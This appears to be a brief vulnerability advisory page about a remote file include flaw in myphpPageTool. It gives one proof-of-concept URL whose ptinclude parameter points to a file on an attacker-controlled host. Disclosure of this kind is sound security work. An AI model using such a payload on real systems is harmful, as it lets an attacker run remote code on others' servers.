• info
• discussion
• exploit
• solution
• references

myphpPageTool Remote File Include Vulnerability

The following proof of concept was provided:

http://[target]/doc/admin/index.php?ptinclude=http://[attacker]/pt_config.inc